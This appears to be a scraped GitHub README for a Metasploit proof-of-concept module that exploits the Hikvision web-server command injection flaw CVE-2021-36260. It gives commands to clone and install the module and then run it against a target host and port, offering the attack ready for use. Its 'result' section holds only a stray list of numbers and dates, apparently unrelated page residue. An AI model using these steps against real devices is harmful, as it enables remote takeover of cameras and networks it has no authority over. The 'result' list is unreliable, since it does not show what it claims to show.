CVE-2021-36260-metasploit
the metasploit script(POC) about CVE-2021-36260. A command injection vulnerability in the web server of some Hikvision product, attacker can exploit the vulnerability to launch a command injection attack by sending some messages with malicious commands.
preparation POC
git clone https://github.com/TaroballzChen/CVE-2021-36260-metasploit
cd CVE-2021-36260-metasploit
mkdir -p ~/.msf4/modules/auxiliary/scanner/http
cp hikvision_web_server_build_210702_command_injection.py ~/.msf4/modules/auxiliary/scanner/http/
chmod +x ~/.msf4/modules/auxiliary/scanner/http/hikvision_web_server_build_210702_command_injection.py
msfconsole
POC usage
set rhost <vuln ip/host>
set port <vuln port>
set ssl <default: false for http>
exploit
result
6 Jul 13, 2022
33 Jul 01, 2022
87 Dec 29, 2021
3 Nov 23, 2022
96 Dec 20, 2022
20 Nov 11, 2022
1 Dec 03, 2021
2 Nov 09, 2022
11 Dec 07, 2022
3 Mar 25, 2022
1 Dec 03, 2021
133 Dec 18, 2022
9 Sep 21, 2022
365 Nov 30, 2022
3 Nov 28, 2021
228 Nov 25, 2022
3 Dec 16, 2022
1 Nov 11, 2021
31 Sep 28, 2022
39 Dec 10, 2022